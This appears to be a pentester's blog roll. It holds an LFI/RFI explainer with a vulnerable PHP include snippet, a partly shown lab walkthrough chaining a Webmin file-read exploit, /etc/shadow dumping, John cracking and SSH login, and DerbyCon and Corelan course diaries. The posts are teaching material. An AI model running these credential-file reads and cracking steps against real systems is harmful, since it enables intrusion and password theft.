Windows/Linux LFI/RFI + MSF + Fimap = call me tons of fun

Hey guys, as promised I wanted to do something a little different. I made a sample video of Fimap, which is a tool to find and exploit Local and Remote File Inclusion bugs. If you aren’t familiar with the tool you can check it out here.

File inclusion(FI) happens when an attacker can include files through a web script or an improperly coded page. You can learn more about LFI/RFI here. Most people confuse LFI/RFI with browser traversal, while both are bad, LFI/RFI can lead to fun times for a pentester.

When looking for FI bugs, I attempt to see if the php code uses commonly vulnerable functions (e.g. include_once, fopen, file_get_contents, etc.). In the example that I will be attacking, the page uses the “include” function. Some of these functions can be manipulated in the “php.ini” file. More info can be found here and here.

You will normally see code like this:

$incfile = $_REQUEST["page"];
include($incfile.".php");

In this example, the potentially vulnerable parameter is “page” because of the way the file ($incfile) is being “included”.

Scenario: We are attacking two machines (Linux and Windows). I wanted to show the versatility of the tool and how easy it is to go from identifying the bug to Admin/Root.

[youtube=http://www.youtube.com/watch?v=AIigCni-bJI&w=420&h=315]

Sorry for the delay, I guess things went crazy. Ahwell!!! Hope you enjoy!

Now that I sort of worked out the video issue, I am going to do a mini-series on Exploit Dev. This series will cover setting up the lab environment, writing our exploits in python and ruby(MSF) to semi-advanced software protection bypass.

Webmin + John = root!

I wanted to do something different this week, however the video I recorded crashed and didnt save correctly. sniffles I will attempt to do a video this weekend since I have some extra time and get it uploaded for next week. I still wanted to do something, so I was going through some of my old notes and decided to write about an oldie but goodie.

Scenario:
I was approached by a mean kitteh. He said that if we can hack into his box, we can have all the beers we want. However, he said that if we cannot hack into his box, he will eat our faces and piss on our favorite Batman Chucks!! 🙁 Since I love beer, I figured why not.

After scanning the kitteh’s network, I came across the following port open on a host:

Webmin on default port

I wanted to make sure I could reach the victim on that port by visiting the IP:PORT in our browser. Since, my other scans were not completed yet, I went to the Googles!! However, if I previously scanned the victim with hydra or nessus, etc… Maybe I was lucky enough to find weak passwords. If that is the case, game is pretty much over, depending on how webmin was installed.

default

As you can see from the screenshot, webmin is running with root permissions, so we can execute any command that we want. However, if you aren’t that lucky. Extra research can come in handy. I have identified that this version of webmin has a flaw that will allow us to retrieve files from the local system. This could come in handy! Of course, you can easily search the Internet and find many exploits or ways to hack this version of Webmin.

Now that we have done our research and have found a promising exploit. Lets get to work!!!

perl

Ok, from the exploit we see that the default vaules are:

url - victim url/ip
port - in most cases the default is "10000"
filename - the name of the file you are looking to retrieve
target - whether the victim uses HTTP or HTTPS

That seems simple enough. The easiest thing to do is to attempt to retrieve the “/etc/passwd” file; as this file should be “world” accessible this is a good first test.

pass

Awesome, looks like we can read the “/etc/passwd” file. Lets see if we can read any other files, like the “/etc/shadow” file. 😉 YAY! we can read that file as well. Lets save them to a file in preparation for our next step with john.

root@L4mers3c:~# perl 2017.pl 192.168.160.156 10000 /etc/passwd 0 > passwd.txt

root@L4mers3c:~# perl 2017.pl 192.168.160.156 10000 /etc/shadow 0 > shadow.txt

You may have to clean up the output a little.

Now that we have both files saved, we can use a cool utility that comes along with John the Ripper (JTR) called “unshadow”. Unshadow will take an “/etc/passwd” file and merge it with an “/etc/shadow” file and hopefully allow us to crack the passwords. Of course this depends on how secure and complex the kittehs passwords are.

root@L4mers3c:~# unshadow passwd.txt shadow.txt > both.txt

Now that both files are merged, we can attempt to crack them with JTR.

john

As you can see we have cracked some of the really weak passwords. hmmm! During scanning I noticed that SSH was running on this host. Lets see if we can login with one of the accounts that we have found.

ssh

Game Over!! Well not really, if we look at our user permissions, we arent root! The kitteh said we cannot have a beer until we get root. We can go through the normal post exploitation steps and look for a local exploit.

[l4mers3c@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux
[l4mers3c@localhost ~]$

After searching on the Interwebz, we find that our victim is potentially vulnerable to the “Linux sock_sendpage() NULL pointer dereference” exploit. Lets move it over to our victim and see what we can do.

root@L4mers3c:~# service apache2 start
[ ok ] Starting web server: apache2.
root@L4mers3c:~# searchsploit sock
Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit Continue reading Webmin + John = root!

Derbycon + sleepiness = Good Times!!

I had a great time at DerbyCon, I am already looking forward to next year. I hope to be ready to submit a talk, as the stats are at 57% for new speakers, makes me want to get my butt in gear and find the inspiration to do some research.

This pretty much sums up my DerbyCon experience! Great time at the Friday Night party. Awesome time speaking with Int80 from DualCore. He is the coolest marthafocka on the planet!

Int80 from Dual Core
Int80 from Dual Core

And of course, me not being able to keep my eyes open during lunch.

sleepy

There was some talk about it being over crowded. I didn’t really notice, honestly after the first two days of the Corelan class the rest of the con was mostly a blur. I am afraid of the mass panic that it might cause next year with ticket purchases. Of course as Derbycon grows each year, I probably will be glad that they are capping off the tickets. My wife pointed out that there were a lot more females this year, I guess I didn’t notice until a group of them went to lunch and then all of a sudden she was pointing out all of her new Con Buddies. My wife had a great time and she is not a techy, but she loved going to the SE talks and meeting new people. This con always had this great family feel, I received several hugs this past week, even from Re1ik himself. haha! My wife talked with Larry Pesce about ear gauging and other things. But this proves one thing, DerbyCon is a great con and if you have not been able to make it out to one, I really would suggest attempting to. There are no egos, everyone was definitely approachable and once the beer started to flow, that became even more so. I am hoping to do the triple crown next year, which consists of DerbyCon in Kentucky, HackerCon in WV, and SkyDogCon in TN. If I play my cards right, maybe I will get a chance to speak at all 3.

As always, IronGeek will have all the videos up soon, I cant wait to check out the talks that I missed. Anyway, as for the blog, in my crazy attempt to post at least once a week, I plan on doing some video blogs pretty soon. I always come back from a Con with tons of stuff I want to do.

I met some great people this year, I spoke quite a bit with the guys that run the Good Samaritan Project; If you can or want to help out contact these guys and see how you can do some good with your GoogleFu. Also, check out Hackers for Charity, they are trying to do some good in this world and I finally had a chance to sign up to help out locally.

Until next time….HACK ALL THE THINGS, DRINK ALL THE BOOZE!!!!

Hell Day 2 aka Corelan Win 32 Exploit Dev Bootcamp Day 2

Wow, we didn’t get out until 2am and everyone looked exhausted or defeated. hah! No really, day 2 was really fast paced. We covered tons of stuff (e.g. tons of seh and advanced mitigation bypass, writing metasploit modules, browser and heap stuff) and as I stated in the post about day 1, you really need to have some idea of what you are doing. Diving deep into Mona.py and the powerful features of Windbg (providing that your machine doesn’t crap out or you cant download your symbol files correctly sighs). However, you don’t have to be a pro at this stuff, it helps but not necessary. Corelan was/is a great teacher, and the teaching assistants were great; it is rare to have a great teacher and a course where the aids know quite a bit about the topics. He even went further to mention his site and forums, as well as the special forums we get as students of the course; if access to the special forums is the only thing you get from this class then that is enough. Lincoln and _sinner were great aids and helped me out a bit during the course with little tidbits. It was also nice to know that some of my ExDev “habits” were shared with them. haha!

Take away from the entire training:
I have made a commitment to myself to work on 1 exploit a week. These will be taking various things from MSF and Exploitdb and converting them to python and hopefully msf. I will hopefully make a blog or two about my experiences and progress. Also, during this time I will be focusing back on OSCE and hopefully by November or December I will sit for the test. Corelan really stressed the fact that he worked on 2 exploits a week to keep at this stuff, because it is not his day job. Which really shocked me, but gave me motivation. It is amazing how much I have learned in this course and even though it was a rough course I would take it again. In fact I may depending on my schedule and financial responsibilities, in a year or so, just to see where I am. This course will definitely teach you how to think and basic troubleshooting of your code. He also provided a few scripts to help with different things ( outside of what mona can do). muahahah! I think the biggest thing I got from this course is not giving up! I got really frustrated when things were landing right in my exploits, but taking a step back and looking at my mistakes really taught me to just be patient and it is probably something simple that I am missing.

If you have a chance to take the course, you wont regret it. Oh, stop using NOPs in your exploit. haha! Prepare for pain and long nights. Have a beer or a few shots to calm your nerves and don’t give up.

Back to DerbyCon!!!

DerbyCon + Corelan Win32 Exploit Dev Bootcamp Day 1 = OMG!

I am having such a killer time at DerbyCon. It has only been a day and I have already met new people and am seeing a lot of familiar faces from last year. I love small cons, mainly this one, because no one seems to have an ego here and everyone is just chill. I highly recommend coming out to DerbyCon if you have a chance. Also, remember to try the Burbon Beer from the Sway lounge, its my fav.

Anyway, the real reason for this post. The Corelan bootcamp is everything I thought it would be. We went from 0-60 in no time. We started at 830am and didn’t finish until Midnight, mostly because everyone in class was dead tired and couldn’t finish the last module of day 1. The first exploit lab has a lot of gotchas that will challenge the way you think; no its not your typical FTP server exploit. He really stressed about all the bad habits we n00bs learn from just doing random tutorials around the interwebs. Its crazy, how many times I have done exploits using ‘NOPS’ and the first thing he says in class is ” NOPS are for lazy a*holes” and then started to explain to us why we shouldn’t use them. However, there is a place and a time where you can use them, but the majority of the time you shouldn’t use them. Troubleshooting your programs is a more efficient way to learning and challenging yourself. I have noticed that the more I am moving into Exploit Dev there are a 1000 ways to skin a cat and now I am trying to soak in all the information. I would say that if you have followed his tutorials  then you should have a good understanding of how basic Stack Based overflows work. However, I would go over the material a few times, and actually attempt to do the higher level stuff (e.g. Heap, SEH, DEP, and ASLR). I would not be scared to take the class, even though it is a difficult class, Corelan does a really good job of explaining the material and making sure you are understanding the fundamentals. Sometimes, we as n00bs, just follow directions and really have no idea why we are doing certain things. Corelan spent a good chunk of day 1 covering the basics before we jumped into labs.

<

p>If you are thinking about taking the the OSCE or the AWE, I would definitely figure out a way to take Corelan’s course first. I already feel a lot more comfortable doing Exploit Dev and working in a debugger. Of course even to sign up for the OSCE I would suggest that you know your way around the debugger, but its nice to know that all my practice is really helping. Again, I would not be scared to take this course if you are just starting out. I think going through the many tutorials on the Net and his tutorials will really give you a great start. However, I would say know python or at least be familiar with it.  My plans are to work through this course material and then jump back into OSCE mode.

Anyway, I am going to grab breakfast and get ready for Day 2 aka “Hell Day 2”.